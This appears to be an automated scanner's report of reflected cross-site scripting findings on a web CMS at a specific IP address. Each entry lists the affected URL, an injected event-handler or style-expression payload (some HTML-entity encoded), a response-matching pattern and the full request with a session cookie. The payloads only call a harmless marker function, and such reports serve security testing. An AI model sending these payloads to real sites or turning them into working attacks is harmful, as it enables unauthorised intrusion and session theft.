Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.mhtml'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20
2. Set parameter '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6549)
Request & response GET /index.php/article/c17/p2.mhtml'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
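Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.mhtml?'%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6762)
Request & response GET /index.php/article/c19/p2.mhtml?'%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20 HTTP/1.1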
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
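Request method GET
Affected parameter var
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.mhtml?var='%20onmouseover=%22dfbhmg(6865)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6865)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6865)
Request & response GET /index.php/article/c19/p2.mhtml?var='%20onmouseover=%22dfbhmg(6865)%22%3e%20 HTTP/1.1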
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
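Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.mhtml/'%20onmouseover=dfbhmg(6526)%20
2. Set parameter '%20onmouseover=dfbhmg(6526)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6526)
Request & response GET /index.php/article/c19/p2.mhtml/'%20onmouseover=dfbhmg(6526)%20 HTTP/1.1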
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.mhtml;'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20
2. Set parameter '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6631)
Request & response GET /index.php/article/c19/p2.mhtml;'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
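Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c19/p2.mhtml'%20onmouseover=dfbhmg(6894)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6894)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6894)
Request & response GET /index.php/article/c19/p2.mhtml'%20onmouseover=dfbhmg(6894)%20var=%20 HTTP/1.1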
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
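Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c36/p2.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6060))
Request & response GET /index.php/article/c36/p2.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20 HTTP/1.1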
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c36/p2.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20
2. Set parameter var'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6996)
Request & response GET /index.php/article/c36/p2.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
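Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c36/p2.mhtml/'%20onmouseover=dfbhmg(6960)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6960)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6960)
Request & response GET /index.php/article/c36/p2.mhtml/'%20onmouseover=dfbhmg(6960)%20var=%20 HTTP/1.1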
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
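Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c36/p2.mhtml;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6936))
Request & response GET /index.php/article/c36/p2.mhtml;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20 HTTP/1.1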
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
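Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/article/c36/p2.mhtml'%20onmouseover=dfbhmg(6537)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6537)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6537)
Request & response GET /index.php/article/c36/p2.mhtml'%20onmouseover=dfbhmg(6537)%20var=%20 HTTP/1.1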
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/message-comment-article-33.mhtml
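Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6444)
Request & response GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20.mhtml HTTP/1.1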
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/33.mhtml

URL http://202.201.39.48/index.php/message-comment-article-32.mhtml
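Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6569)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6569)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6569)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6569)%20.mhtml HTTP/1.1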
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/32.mhtml

URL http://202.201.39.48/index.php/message-comment-article-23.mhtml
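Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6334)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6334)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6334)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6334)%20.mhtml HTTP/1.1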
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/23.mhtml

URL http://202.201.39.48/index.php/message-comment-article-34.mhtml
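Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6701)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6701)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6701)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6701)%20.mhtml HTTP/1.1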
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/34.mhtml

URL http://202.201.39.48/index.php/message-comment-article-28.mhtml
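Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6336)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6336)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6336)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6336)%20.mhtml HTTP/1.1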
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/28.mhtml

URL http://202.201.39.48/index.php/message-comment-article-25.mhtml
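Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6711)
Request & response GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20.mhtml HTTP/1.1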
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/25.mhtml

URL http://202.201.39.48/index.php/message-comment-article-29.mhtml
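Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6645)%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6645)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6645)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6645)%20var=%20.mhtml HTTP/1.1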
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/29.mhtml

URL http://202.201.39.48/index.php/message-comment-article-30.mhtml
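Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6940)%22%3e%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(6940)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6940)
Request & response GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6940)%22%3e%20.mhtml HTTP/1.1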
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/30.mhtml

URL http://202.201.39.48/index.php/message-comment-article-35.mhtml
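Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6623)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6623)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6623)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6623)%20.mhtml HTTP/1.1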
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/35.mhtml

URL http://202.201.39.48/index.php/message-comment-article-21.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20.mhtml
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6855)
Request & response GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/21.mhtml

URL http://202.201.39.48/index.php/message-comment-article-19.mhtml
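Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6435)%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6435)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6435)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6435)%20var=%20.mhtml HTTP/1.1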
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/19.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
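Request method GET
Affected parameter value1
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-view-"%20onmouseover=dfbhmg(6630)%20.mhtml
2. Set parameter value1"%20onmouseover=dfbhmg(6630)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6630)
Request & response GET /index.php/user-deny-product-view-"%20onmouseover=dfbhmg(6630)%20.mhtml HTTP/1.1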
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/chanzhi-1.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6394)%22%3e%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
2. Set parameter value0"%20onmouseover=%22dfbhmg(6394)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6394)
Request & response GET /index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6394)%22%3e%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/chanzhi-1.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
2. Set parameter value0"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6765)
Request & response GET /index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6765)%22%3e%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html HTTP/1.1
